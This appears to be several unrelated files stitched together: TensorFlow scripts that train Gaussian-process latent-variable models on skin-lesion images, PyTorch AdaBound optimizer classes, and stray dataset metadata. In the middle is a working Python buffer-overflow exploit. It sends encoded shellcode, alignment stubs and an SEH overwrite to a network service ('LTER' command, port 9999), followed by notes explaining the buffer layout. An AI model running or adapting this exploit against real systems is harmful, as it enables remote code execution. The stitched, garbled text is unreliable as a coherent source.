print(' Diagnosis labels: ({}, {}, {}, {}, {}, {})'.format(label_1, label_2, label_3, label_4, label_5,
label_6))
# Define instance of necessary model.
if not isfile(bgplvm_results_file):
# Reset the default graph before building a new model graph; this speeds up the script.
tf.reset_default_graph()
np.random.seed(1) # Random seed.
model = bgplvm(y_train=y_train,
num_inducing_points=num_inducing_points,
num_latent_dims=num_latent_dimensions)
model_training_objective = model.objective
# Optimisation.
model_opt_train = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(
loss=model_training_objective)
with tf.Session() as s:
# Initialise variables.
s.run(tf.global_variables_initializer())
# Training optimisation loop.
start_time = time()
print('\nTraining BGP-LVM:')
for c in range(train_iter):
s.run(model_opt_train)
if (c % 100) == 0:
print(' BGP-LVM opt iter {:5}: {}'.format(c, s.run(model_training_objective)))
end_time = time()
train_opt_time = end_time - start_time
final_cost = s.run(model_training_objective)
print('Final iter {:5}:'.format(c))
print(' BGP-LVM: {}'.format(final_cost))
print('Time to optimise: {} s'.format(train_opt_time))
# Get converged values as numpy arrays.
ard_weights, noise_precision, signal_variance, inducing_input = \
s.run(
(model.ard_weights, model.noise_precision, model.signal_variance, model.inducing_input))
x_mean, x_covar = s.run(model.q_x)
# Save results.
print('\nSaving results to .npz file.')
np.savez(bgplvm_results_file, original_data=six_groups_images, y_train=y_train,
ard_weights=ard_weights, noise_precision=noise_precision, signal_variance=signal_variance,
x_u=inducing_input, x_mean=x_mean, x_covar=x_covar, train_opt_time=train_opt_time,
final_cost=final_cost)
if not isfile(mrd_results_file):
# Reset the default graph before building a new model graph; this speeds up the script.
tf.reset_default_graph()
np.random.seed(1) # Random seed.
# Define instance of MRD with known views.
model = mrd(views_train=[y_train[:, i:i + 64] for i in range(0, 384, 64)],
num_inducing_points=num_inducing_points,
num_latent_dims=num_latent_dimensions)
model_training_objective = model.objective
# Optimisation.
model_opt_train = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(
loss=model_training_objective)
with tf.Session() as s:
# Initialise variables.
s.run(tf.global_variables_initializer())
# Training optimisation loop.
start_time = time()
print('\nTraining MRD:')
for c in range(train_iter):
s.run(model_opt_train)
if (c % 100) == 0:
print(' MRD opt iter {:5}: {}'.format(c, s.run(model_training_objective)))
end_time = time()
train_opt_time = end_time - start_time
final_cost = s.run(model_training_objective)
print('Final iter {:5}:'.format(c))
print(' MRD: {}'.format(final_cost))
print('Time to optimise: {} s'.format(train_opt_time))
# Get converged values as numpy arrays.
ard_weights, noise_precision, signal_variance, inducing_input = \
s.run(
(model.ard_weights, model.noise_precision, model.signal_variance, model.inducing_input))
x_mean, x_covar = s.run(model.q_x)
# Save results.
print('\nSaving results to .npz file.')
np.savez(mrd_results_file, original_data=six_groups_images, y_train=y_train,
ard_weights=ard_weights, noise_precision=noise_precision, signal_variance=signal_variance,
x_u=inducing_input, x_mean=x_mean, x_covar=x_covar, train_opt_time=train_opt_time,
final_cost=final_cost)
if not isfile(gpdp_results_file):
# Reset the default graph before building a new model graph; this speeds up the script.
tf.reset_default_graph()
np.random.seed(1) # Random seed.
# Define instance of DP-GP-LVM. The DP mask defaults to 1.
model = dp_gp_lvm(y_train=y_train,
num_inducing_points=num_inducing_points,
num_latent_dims=num_latent_dimensions,
truncation_level=truncation_level)
model_training_objective = model.objective
# Optimisation.
model_opt_train = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(
loss=model_training_objective)
with tf.Session() as s:
# Initialise variables.
s.run(tf.global_variables_initializer())
# Training optimisation loop.
start_time = time()
print('\nTraining DP-GP-LVM:')
for c in range(train_iter):
s.run(model_opt_train)
if (c % 100) == 0:
print(' DP-GP-LVM opt iter {:5}: {}'.format(c, s.run(model_training_objective)))
end_time = time()
train_opt_time = end_time - start_time
final_cost = s.run(model_training_objective)
print('Final iter {:5}:'.format(c))
print(' DP-GP-LVM: {}'.format(final_cost))
print('Time to optimise: {} s'.format(train_opt_time))
# Get converged values as numpy arrays.
ard_weights, noise_precision, signal_variance, inducing_input, assignments = \
s.run(
(model.ard_weights, model.noise_precision, model.signal_variance, model.inducing_input,
model.assignments))
x_mean, x_covar = s.run(model.q_x)
w_1, w_2 = s.run(model.dp.q_alpha)
gamma_atoms, alpha_atoms, beta_atoms = s.run(model.dp_atoms)
# Save results.
print('\nSaving results to .npz file.')
np.savez(gpdp_results_file, original_data=six_groups_images, y_train=y_train,
ard_weights=ard_weights, noise_precision=noise_precision, signal_variance=signal_variance,
x_u=inducing_input, assignments=assignments, x_mean=x_mean, x_covar=x_covar,
gamma_atoms=gamma_atoms, alpha_atoms=alpha_atoms, beta_atoms=beta_atoms,
q_alpha_w1=w_1, q_alpha_w2=w_2, train_opt_time=train_opt_time, final_cost=final_cost)
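# Shape sanity check for the hstack layout used above (added sketch with dummy
# arrays): k groups contributing 64 pixel columns each stack into a
# [num_samples x 64k] matrix, e.g. 6 groups of 5 samples give (5, 384).
import numpy as np
assert np.hstack([np.zeros((5, 64)) for _ in range(6)]).shape == (5, 384)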
# Loop through the set of all labels to create the training data set. Only one such set exists: all seven labels [0-6].
for label_1, label_2, label_3, label_4, label_5, label_6, label_7 in combinations(np.unique(labels), 7):
# May need to update variational parameter sizes to avoid GPU memory overflow.
num_inducing_points = 20
num_latent_dimensions = 22
truncation_level = 25
# Define file path for results.
dataset_str = 'skin_cancer_mnist_{}_{}_{}_{}_{}_{}_{}'.format(label_1, label_2, label_3, label_4, label_5,
label_6, label_7)
bgplvm_results_file = RESULTS_FILE_NAME.format(model='bgplvm',
dataset=dataset_str)
mrd_results_file = RESULTS_FILE_NAME.format(model='mrd',
dataset=dataset_str)
gpdp_results_file = RESULTS_FILE_NAME.format(model='dp_gp_lvm',
dataset=dataset_str)
# Load randomised data for the specific label set if any of the model results do not exist.
if any([not isfile(bgplvm_results_file),
not isfile(mrd_results_file),
not isfile(gpdp_results_file)]):
seven_conditions_data_file = DATA_PATH + \
'skin_cancer_mnist/seven_conditions_data_{}_{}_{}_{}_{}_{}_{}.npy'.format(label_1, label_2, label_3,
label_4, label_5, label_6,
label_7)
if isfile(seven_conditions_data_file):
# Read NumPy file of randomised data.
seven_groups_images = np.load(seven_conditions_data_file)
else:
group_1_images = image_data[np.equal(labels, label_1)]
group_2_images = image_data[np.equal(labels, label_2)]
group_3_images = image_data[np.equal(labels, label_3)]
group_4_images = image_data[np.equal(labels, label_4)]
group_5_images = image_data[np.equal(labels, label_5)]
group_6_images = image_data[np.equal(labels, label_6)]
group_7_images = image_data[np.equal(labels, label_7)]
# Update number of samples if specific label does not have enough.
num_samples = 65
num_samples = min(num_samples, group_1_images.shape[0], group_2_images.shape[0],
group_3_images.shape[0], group_4_images.shape[0], group_5_images.shape[0],
group_6_images.shape[0], group_7_images.shape[0])
# Randomly permute observations.
np.random.seed(1) # Random seed.
rand_indices_1 = np.random.permutation(group_1_images.shape[0])
rand_indices_2 = np.random.permutation(group_2_images.shape[0])
rand_indices_3 = np.random.permutation(group_3_images.shape[0])
rand_indices_4 = np.random.permutation(group_4_images.shape[0])
rand_indices_5 = np.random.permutation(group_5_images.shape[0])
rand_indices_6 = np.random.permutation(group_6_images.shape[0])
rand_indices_7 = np.random.permutation(group_7_images.shape[0])
# Combine into [num_samples x 448] data.
seven_groups_images = np.hstack((group_1_images[rand_indices_1[:num_samples]],
group_2_images[rand_indices_2[:num_samples]],
group_3_images[rand_indices_3[:num_samples]],
group_4_images[rand_indices_4[:num_samples]],
group_5_images[rand_indices_5[:num_samples]],
group_6_images[rand_indices_6[:num_samples]],
group_7_images[rand_indices_7[:num_samples]]))
assert seven_groups_images.shape[0] == num_samples, 'Number of subsampled observations does not match num_samples.'
assert seven_groups_images.shape[1] == 448, \
'Number of pixels does not match the expected 64 per group (7 x 64 = 448).'
# Save randomised data.
np.save(seven_conditions_data_file, seven_groups_images)
# Normalise data to zero mean and unit variance.
scaler = StandardScaler()
y_train = scaler.fit_transform(seven_groups_images)
num_samples, num_output_dimensions = y_train.shape
# Print info.
print('\nSkin Cancer MNIST Data:')
print(' Total number of observations (N): {}'.format(num_samples))
print(' Total number of output dimensions (D): {}'.format(num_output_dimensions))
print(' Diagnosis labels: ({}, {}, {}, {}, {}, {}, {})'.format(label_1, label_2, label_3, label_4, label_5,
label_6, label_7))
# Define instance of necessary model.
if not isfile(bgplvm_results_file):
# Reset the default graph before building a new model graph; this speeds up the script.
tf.reset_default_graph()
np.random.seed(1) # Random seed.
model = bgplvm(y_train=y_train,
num_inducing_points=num_inducing_points,
num_latent_dims=num_latent_dimensions)
model_training_objective = model.objective
# Optimisation.
model_opt_train = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(
loss=model_training_objective)
with tf.Session() as s:
# Initialise variables.
s.run(tf.global_variables_initializer())
# Training optimisation loop.
start_time = time()
print('\nTraining BGP-LVM:')
for c in range(train_iter):
s.run(model_opt_train)
if (c % 100) == 0:
print(' BGP-LVM opt iter {:5}: {}'.format(c, s.run(model_training_objective)))
end_time = time()
train_opt_time = end_time - start_time
final_cost = s.run(model_training_objective)
print('Final iter {:5}:'.format(c))
print(' BGP-LVM: {}'.format(final_cost))
print('Time to optimise: {} s'.format(train_opt_time))
# Get converged values as numpy arrays.
ard_weights, noise_precision, signal_variance, inducing_input = \
s.run(
(model.ard_weights, model.noise_precision, model.signal_variance, model.inducing_input))
x_mean, x_covar = s.run(model.q_x)
# Save results.
print('\nSaving results to .npz file.')
np.savez(bgplvm_results_file, original_data=seven_groups_images, y_train=y_train,
ard_weights=ard_weights, noise_precision=noise_precision, signal_variance=signal_variance,
x_u=inducing_input, x_mean=x_mean, x_covar=x_covar, train_opt_time=train_opt_time,
final_cost=final_cost)
if not isfile(mrd_results_file):
# Reset the default graph before building a new model graph; this speeds up the script.
tf.reset_default_graph()
np.random.seed(1) # Random seed.
# Define instance of MRD with known views.
model = mrd(views_train=[y_train[:, i:i + 64] for i in range(0, 448, 64)],
num_inducing_points=num_inducing_points,
num_latent_dims=num_latent_dimensions)
model_training_objective = model.objective
# Optimisation.
model_opt_train = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(
loss=model_training_objective)
with tf.Session() as s:
# Initialise variables.
s.run(tf.global_variables_initializer())
# Training optimisation loop.
start_time = time()
print('\nTraining MRD:')
for c in range(train_iter):
s.run(model_opt_train)
if (c % 100) == 0:
print(' MRD opt iter {:5}: {}'.format(c, s.run(model_training_objective)))
end_time = time()
train_opt_time = end_time - start_time
final_cost = s.run(model_training_objective)
print('Final iter {:5}:'.format(c))
print(' MRD: {}'.format(final_cost))
print('Time to optimise: {} s'.format(train_opt_time))
# Get converged values as numpy arrays.
ard_weights, noise_precision, signal_variance, inducing_input = \
s.run(
(model.ard_weights, model.noise_precision, model.signal_variance, model.inducing_input))
x_mean, x_covar = s.run(model.q_x)
# Save results.
print('\nSaving results to .npz file.')
np.savez(mrd_results_file, original_data=seven_groups_images, y_train=y_train,
ard_weights=ard_weights, noise_precision=noise_precision, signal_variance=signal_variance,
x_u=inducing_input, x_mean=x_mean, x_covar=x_covar, train_opt_time=train_opt_time,
final_cost=final_cost)
if not isfile(gpdp_results_file):
# Reset the default graph before building a new model graph; this speeds up the script.
tf.reset_default_graph()
np.random.seed(1) # Random seed.
# Define instance of DP-GP-LVM. The DP mask defaults to 1.
model = dp_gp_lvm(y_train=y_train,
num_inducing_points=num_inducing_points,
num_latent_dims=num_latent_dimensions,
truncation_level=truncation_level)
model_training_objective = model.objective
# Optimisation.
model_opt_train = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(
loss=model_training_objective)
with tf.Session() as s:
# Initialise variables.
s.run(tf.global_variables_initializer())
# Training optimisation loop.
start_time = time()
print('\nTraining DP-GP-LVM:')
for c in range(train_iter):
s.run(model_opt_train)
if (c % 100) == 0:
print(' DP-GP-LVM opt iter {:5}: {}'.format(c, s.run(model_training_objective)))
end_time = time()
train_opt_time = end_time - start_time
final_cost = s.run(model_training_objective)
print('Final iter {:5}:'.format(c))
print(' DP-GP-LVM: {}'.format(final_cost))
print('Time to optimise: {} s'.format(train_opt_time))
# Get converged values as numpy arrays.
ard_weights, noise_precision, signal_variance, inducing_input, assignments = \
s.run(
(model.ard_weights, model.noise_precision, model.signal_variance, model.inducing_input,
model.assignments))
x_mean, x_covar = s.run(model.q_x)
w_1, w_2 = s.run(model.dp.q_alpha)
gamma_atoms, alpha_atoms, beta_atoms = s.run(model.dp_atoms)
# Save results.
print('\nSaving results to .npz file.')
np.savez(gpdp_results_file, original_data=seven_groups_images, y_train=y_train,
ard_weights=ard_weights, noise_precision=noise_precision, signal_variance=signal_variance,
x_u=inducing_input, assignments=assignments, x_mean=x_mean, x_covar=x_covar,
gamma_atoms=gamma_atoms, alpha_atoms=alpha_atoms, beta_atoms=beta_atoms,
q_alpha_w1=w_1, q_alpha_w2=w_2, train_opt_time=train_opt_time, final_cost=final_cost)
#!/usr/bin/python
import socket
import os
import sys
buf = ""
buf += "\x53\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
buf += "\x79\x6c\x6b\x58\x4c\x42\x53\x30\x47\x70\x47\x70\x73"
buf += "\x50\x4c\x49\x39\x75\x46\x51\x69\x50\x71\x74\x4c\x4b"
buf += "\x32\x70\x74\x70\x4c\x4b\x66\x32\x46\x6c\x4e\x6b\x33"
buf += "\x62\x45\x44\x6c\x4b\x74\x32\x66\x48\x74\x4f\x68\x37"
buf += "\x43\x7a\x44\x66\x65\x61\x39\x6f\x4c\x6c\x35\x6c\x75"
buf += "\x31\x33\x4c\x75\x52\x54\x6c\x51\x30\x69\x51\x38\x4f"
buf += "\x46\x6d\x56\x61\x39\x57\x5a\x42\x58\x72\x72\x72\x46"
buf += "\x37\x4e\x6b\x76\x32\x42\x30\x6e\x6b\x30\x4a\x57\x4c"
buf += "\x6e\x6b\x72\x6c\x66\x71\x53\x48\x4a\x43\x63\x78\x75"
buf += "\x51\x6e\x31\x62\x71\x4c\x4b\x56\x39\x67\x50\x55\x51"
buf += "\x49\x43\x6e\x6b\x52\x69\x35\x48\x49\x73\x54\x7a\x71"
buf += "\x59\x4e\x6b\x74\x74\x6c\x4b\x46\x61\x6b\x66\x54\x71"
buf += "\x49\x6f\x6c\x6c\x6f\x31\x68\x4f\x34\x4d\x46\x61\x58"
buf += "\x47\x56\x58\x39\x70\x52\x55\x58\x76\x64\x43\x71\x6d"
buf += "\x6a\x58\x77\x4b\x51\x6d\x66\x44\x71\x65\x79\x74\x31"
buf += "\x48\x4e\x6b\x61\x48\x54\x64\x63\x31\x4e\x33\x33\x56"
buf += "\x6e\x6b\x66\x6c\x52\x6b\x6c\x4b\x71\x48\x35\x4c\x47"
buf += "\x71\x6a\x73\x4c\x4b\x35\x54\x4c\x4b\x37\x71\x7a\x70"
buf += "\x4b\x39\x43\x74\x64\x64\x57\x54\x33\x6b\x71\x4b\x51"
buf += "\x71\x62\x79\x52\x7a\x46\x31\x4b\x4f\x4b\x50\x51\x4f"
buf += "\x73\x6f\x51\x4a\x4c\x4b\x45\x42\x6a\x4b\x4c\x4d\x61"
buf += "\x4d\x71\x78\x46\x53\x35\x62\x37\x70\x35\x50\x30\x68"
buf += "\x50\x77\x73\x43\x76\x52\x63\x6f\x46\x34\x42\x48\x42"
buf += "\x6c\x32\x57\x71\x36\x47\x77\x6b\x4f\x79\x45\x58\x38"
buf += "\x4e\x70\x55\x51\x63\x30\x53\x30\x77\x59\x4a\x64\x71"
buf += "\x44\x56\x30\x43\x58\x65\x79\x6d\x50\x42\x4b\x55\x50"
buf += "\x39\x6f\x4a\x75\x76\x30\x76\x30\x30\x50\x50\x50\x63"
buf += "\x70\x62\x70\x33\x70\x50\x50\x75\x38\x49\x7a\x76\x6f"
buf += "\x4b\x6f\x4b\x50\x49\x6f\x78\x55\x4e\x77\x61\x7a\x34"
buf += "\x45\x31\x78\x4f\x30\x4f\x58\x69\x4e\x4c\x45\x52\x48"
buf += "\x33\x32\x35\x50\x77\x61\x33\x6c\x4c\x49\x7a\x46\x71"
buf += "\x7a\x76\x70\x66\x36\x52\x77\x63\x58\x6a\x39\x4e\x45"
buf += "\x31\x64\x51\x71\x49\x6f\x79\x45\x6c\x45\x79\x50\x34"
buf += "\x34\x54\x4c\x79\x6f\x30\x4e\x64\x48\x51\x65\x58\x6c"
buf += "\x32\x48\x6a\x50\x4c\x75\x6e\x42\x50\x56\x79\x6f\x59"
buf += "\x45\x75\x38\x53\x53\x42\x4d\x72\x44\x37\x70\x6b\x39"
buf += "\x4d\x33\x62\x77\x32\x77\x33\x67\x56\x51\x39\x66\x73"
buf += "\x5a\x42\x32\x73\x69\x71\x46\x68\x62\x49\x6d\x71\x76"
buf += "\x6a\x67\x57\x34\x45\x74\x67\x4c\x47\x71\x45\x51\x4e"
buf += "\x6d\x37\x34\x46\x44\x66\x70\x79\x56\x57\x70\x47\x34"
buf += "\x53\x64\x36\x30\x76\x36\x70\x56\x46\x36\x42\x66\x36"
buf += "\x36\x32\x6e\x53\x66\x46\x36\x31\x43\x66\x36\x53\x58"
buf += "\x70\x79\x68\x4c\x77\x4f\x4e\x66\x39\x6f\x7a\x75\x6f"
buf += "\x79\x39\x70\x32\x6e\x73\x66\x33\x76\x6b\x4f\x74\x70"
buf += "\x61\x78\x44\x48\x4d\x57\x37\x6d\x61\x70\x59\x6f\x79"
buf += "\x45\x4f\x4b\x58\x70\x4f\x45\x69\x32\x56\x36\x55\x38"
buf += "\x59\x36\x4d\x45\x6f\x4d\x4f\x6d\x59\x6f\x69\x45\x35"
buf += "\x6c\x35\x56\x53\x4c\x76\x6a\x6f\x70\x39\x6b\x79\x70"
buf += "\x61\x65\x67\x75\x6d\x6b\x77\x37\x62\x33\x30\x72\x32"
buf += "\x4f\x51\x7a\x47\x70\x73\x63\x6b\x4f\x49\x45\x41\x41"
align_esp = "\x5b\x5f\x5c"
zero_eax = "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A"
align_ebx = zero_eax + "\x2D\x55\x55\x55\x5E\x2D\x55\x55\x55\x5E\x2D\x56\x55\x56\x5F" + "\x50"
align_ebx += zero_eax + "\x2D\x2A\x69\x5C\x54\x2D\x2A\x69\x5C\x54\x2D\x2B\x6A\x5C\x54" + "\x50"
magic = align_esp + align_ebx
print "magic length = " + str(len(magic))
buffer = "." + buf + "A" * (3518 - 126 - len(buf)) + magic + "\x46" * (126 - len(magic)) + "\x73\xffBB" + "\x2b\x17\x50\x62" + "D" * (5000 - 3522 - 4)
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(("192.168.222.129", 9999))
print expl.recv(1024)
expl.send("LTER " + buffer + "\r\n")
print expl.recv(1024)
expl.send('EXIT\r\n')
expl.close()
print buffer
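The `buffer` construction above carves a fixed-size payload into regions (shellcode, `A` padding, alignment `magic`, `\x46` filler, short jump, SEH overwrite, trailing `D`s) whose pad lengths are derived from the target offsets. A self-contained sketch of that padding arithmetic; the sizes and byte values below are illustrative placeholders, not the exploit's real offsets:

```python
def pad_to(data: bytes, size: int, filler: bytes = b"A") -> bytes:
    """Pad `data` with `filler` up to exactly `size` bytes."""
    if len(data) > size:
        raise ValueError("section exceeds its allotted size")
    return data + filler * (size - len(data))

shellcode = b"\x90" * 300                      # placeholder shellcode
head = pad_to(shellcode, 3392)                 # shellcode + "A" padding
stub = pad_to(b"\x5b\x5f\x5c", 126, b"\x46")   # alignment stub + filler
seh = b"\x73\xff" + b"BB" + b"CCCC"            # short jump + placeholder handler address
payload = head + stub + seh
assert len(payload) == 3392 + 126 + 8          # every section lands at a fixed offset
```

Keeping each section at a fixed size is what guarantees the SEH overwrite bytes land exactly on the handler slot regardless of shellcode length.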
| 49.891566 | 151 | 0.671577 | 895 | 4,141 | 3.096089 | 0.130726 | 0.030314 | 0.038975 | 0.043306 | 0.070011 | 0.053771 | 0.011909 | 0.011909 | 0.011909 | 0.011909 | 0 | 0.349251 | 0.064477 | 4,141 | 82 | 152 | 50.5 | 0.36603 | 0.003864 | 0 | 0.027397 | 0 | 0.767123 | 0.743938 | 0.71969 | 0.013699 | 1 | 0 | 0 | 0 | 0 | null | null | 0 | 0.041096 | null | null | 0.054795 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
bb0b8ebf4ff4237cdef87eef1cd2498a5d1dfce7 | 31,077 | py | Python | utils/optim.py | tetelias/openeds | 0f77febc947644352aa57b65a9b56237daff39c7 | [
"MIT"
] | 3 | 2020-06-10T11:47:10.000Z | 2021-08-21T23:36:44.000Z | utils/optim.py | tetelias/openeds | 0f77febc947644352aa57b65a9b56237daff39c7 | [
"MIT"
] | null | null | null | utils/optim.py | tetelias/openeds | 0f77febc947644352aa57b65a9b56237daff39c7 | [
"MIT"
] | 1 | 2020-08-21T02:37:59.000Z | 2020-08-21T02:37:59.000Z | import itertools as it
import math
import torch
from torch.optim.optimizer import Optimizer
class AdaBound(Optimizer):
"""Implements AdaBound algorithm.
It has been proposed in `Adaptive Gradient Methods with Dynamic Bound of Learning Rate`_.
Arguments:
params (iterable): iterable of parameters to optimize or dicts defining
parameter groups
lr (float, optional): Adam learning rate (default: 1e-3)
betas (Tuple[float, float], optional): coefficients used for computing
running averages of gradient and its square (default: (0.9, 0.999))
final_lr (float, optional): final (SGD) learning rate (default: 0.1)
gamma (float, optional): convergence speed of the bound functions (default: 1e-3)
eps (float, optional): term added to the denominator to improve
numerical stability (default: 1e-8)
weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
amsbound (boolean, optional): whether to use the AMSBound variant of this algorithm
.. Adaptive Gradient Methods with Dynamic Bound of Learning Rate:
https://openreview.net/forum?id=Bkg3g2R9FX
"""
def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), final_lr=0.1, gamma=1e-3,
eps=1e-8, weight_decay=0, amsbound=False):
if not 0.0 <= lr:
raise ValueError("Invalid learning rate: {}".format(lr))
if not 0.0 <= eps:
raise ValueError("Invalid epsilon value: {}".format(eps))
if not 0.0 <= betas[0] < 1.0:
raise ValueError("Invalid beta parameter at index 0: {}".format(betas[0]))
if not 0.0 <= betas[1] < 1.0:
raise ValueError("Invalid beta parameter at index 1: {}".format(betas[1]))
if not 0.0 <= final_lr:
raise ValueError("Invalid final learning rate: {}".format(final_lr))
if not 0.0 <= gamma < 1.0:
raise ValueError("Invalid gamma parameter: {}".format(gamma))
defaults = dict(lr=lr, betas=betas, final_lr=final_lr, gamma=gamma, eps=eps,
weight_decay=weight_decay, amsbound=amsbound)
super(AdaBound, self).__init__(params, defaults)
self.base_lrs = list(map(lambda group: group['lr'], self.param_groups))
def __setstate__(self, state):
super(AdaBound, self).__setstate__(state)
for group in self.param_groups:
group.setdefault('amsbound', False)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group, base_lr in zip(self.param_groups, self.base_lrs):
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data
if grad.is_sparse:
raise RuntimeError(
'Adam does not support sparse gradients, please consider SparseAdam instead')
amsbound = group['amsbound']
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
# Exponential moving average of gradient values
state['exp_avg'] = torch.zeros_like(p.data)
# Exponential moving average of squared gradient values
state['exp_avg_sq'] = torch.zeros_like(p.data)
if amsbound:
# Maintains max of all exp. moving avg. of sq. grad. values
state['max_exp_avg_sq'] = torch.zeros_like(p.data)
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
if amsbound:
max_exp_avg_sq = state['max_exp_avg_sq']
beta1, beta2 = group['betas']
state['step'] += 1
if group['weight_decay'] != 0:
grad = grad.add(group['weight_decay'], p.data)
# Decay the first and second moment running average coefficient
exp_avg.mul_(beta1).add_(1 - beta1, grad)
exp_avg_sq.mul_(beta2).addcmul_(1 - beta2, grad, grad)
if amsbound:
# Maintains the maximum of all 2nd moment running avg. till now
torch.max(max_exp_avg_sq, exp_avg_sq, out=max_exp_avg_sq)
# Use the max. for normalizing running avg. of gradient
denom = max_exp_avg_sq.sqrt().add_(group['eps'])
else:
denom = exp_avg_sq.sqrt().add_(group['eps'])
bias_correction1 = 1 - beta1 ** state['step']
bias_correction2 = 1 - beta2 ** state['step']
step_size = group['lr'] * math.sqrt(bias_correction2) / bias_correction1
# Applies bounds on actual learning rate
# lr_scheduler cannot affect final_lr, this is a workaround to apply lr decay
final_lr = group['final_lr'] * group['lr'] / base_lr
lower_bound = final_lr * (1 - 1 / (group['gamma'] * state['step'] + 1))
upper_bound = final_lr * (1 + 1 / (group['gamma'] * state['step']))
step_size = torch.full_like(denom, step_size)
step_size.div_(denom).clamp_(lower_bound, upper_bound).mul_(exp_avg)
p.data.add_(-step_size)
return loss
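The dynamic bound applied in `step` above clips the Adam step size between two schedules that both converge to `final_lr`, so training transitions from Adam-like to SGD-like behavior. A scalar sketch of that clamping (values are illustrative):

```python
def bounded_step(final_lr, gamma, step, adam_step):
    # Mirrors the lower/upper bound schedule in AdaBound.step.
    lower = final_lr * (1 - 1 / (gamma * step + 1))
    upper = final_lr * (1 + 1 / (gamma * step))
    return min(max(adam_step, lower), upper)

# Early on the band is wide (the Adam step passes through untouched);
# late in training it pinches toward final_lr.
assert bounded_step(0.1, 1e-3, 1, 0.5) == 0.5
assert abs(bounded_step(0.1, 1e-3, 10**6, 0.5) - 0.1001) < 1e-9
```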
class AdaBoundW(Optimizer):
"""Implements AdaBound algorithm with Decoupled Weight Decay (arxiv.org/abs/1711.05101)
It has been proposed in `Adaptive Gradient Methods with Dynamic Bound of Learning Rate`_.
Arguments:
params (iterable): iterable of parameters to optimize or dicts defining
parameter groups
lr (float, optional): Adam learning rate (default: 1e-3)
betas (Tuple[float, float], optional): coefficients used for computing
running averages of gradient and its square (default: (0.9, 0.999))
final_lr (float, optional): final (SGD) learning rate (default: 0.1)
gamma (float, optional): convergence speed of the bound functions (default: 1e-3)
eps (float, optional): term added to the denominator to improve
numerical stability (default: 1e-8)
weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
amsbound (boolean, optional): whether to use the AMSBound variant of this algorithm
.. Adaptive Gradient Methods with Dynamic Bound of Learning Rate:
https://openreview.net/forum?id=Bkg3g2R9FX
"""
def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), final_lr=0.1, gamma=1e-3,
eps=1e-8, weight_decay=0, amsbound=False):
if not 0.0 <= lr:
raise ValueError("Invalid learning rate: {}".format(lr))
if not 0.0 <= eps:
raise ValueError("Invalid epsilon value: {}".format(eps))
if not 0.0 <= betas[0] < 1.0:
raise ValueError("Invalid beta parameter at index 0: {}".format(betas[0]))
if not 0.0 <= betas[1] < 1.0:
raise ValueError("Invalid beta parameter at index 1: {}".format(betas[1]))
if not 0.0 <= final_lr:
raise ValueError("Invalid final learning rate: {}".format(final_lr))
if not 0.0 <= gamma < 1.0:
raise ValueError("Invalid gamma parameter: {}".format(gamma))
defaults = dict(lr=lr, betas=betas, final_lr=final_lr, gamma=gamma, eps=eps,
weight_decay=weight_decay, amsbound=amsbound)
super(AdaBoundW, self).__init__(params, defaults)
self.base_lrs = list(map(lambda group: group['lr'], self.param_groups))
def __setstate__(self, state):
super(AdaBoundW, self).__setstate__(state)
for group in self.param_groups:
group.setdefault('amsbound', False)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group, base_lr in zip(self.param_groups, self.base_lrs):
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data
if grad.is_sparse:
raise RuntimeError(
'Adam does not support sparse gradients, please consider SparseAdam instead')
amsbound = group['amsbound']
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
# Exponential moving average of gradient values
state['exp_avg'] = torch.zeros_like(p.data)
# Exponential moving average of squared gradient values
state['exp_avg_sq'] = torch.zeros_like(p.data)
if amsbound:
# Maintains max of all exp. moving avg. of sq. grad. values
state['max_exp_avg_sq'] = torch.zeros_like(p.data)
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
if amsbound:
max_exp_avg_sq = state['max_exp_avg_sq']
beta1, beta2 = group['betas']
state['step'] += 1
# Decay the first and second moment running average coefficient
exp_avg.mul_(beta1).add_(1 - beta1, grad)
exp_avg_sq.mul_(beta2).addcmul_(1 - beta2, grad, grad)
if amsbound:
# Maintains the maximum of all 2nd moment running avg. till now
torch.max(max_exp_avg_sq, exp_avg_sq, out=max_exp_avg_sq)
# Use the max. for normalizing running avg. of gradient
denom = max_exp_avg_sq.sqrt().add_(group['eps'])
else:
denom = exp_avg_sq.sqrt().add_(group['eps'])
bias_correction1 = 1 - beta1 ** state['step']
bias_correction2 = 1 - beta2 ** state['step']
step_size = group['lr'] * math.sqrt(bias_correction2) / bias_correction1
# Applies bounds on actual learning rate
# lr_scheduler cannot affect final_lr, this is a workaround to apply lr decay
final_lr = group['final_lr'] * group['lr'] / base_lr
lower_bound = final_lr * (1 - 1 / (group['gamma'] * state['step'] + 1))
upper_bound = final_lr * (1 + 1 / (group['gamma'] * state['step']))
step_size = torch.full_like(denom, step_size)
step_size.div_(denom).clamp_(lower_bound, upper_bound).mul_(exp_avg)
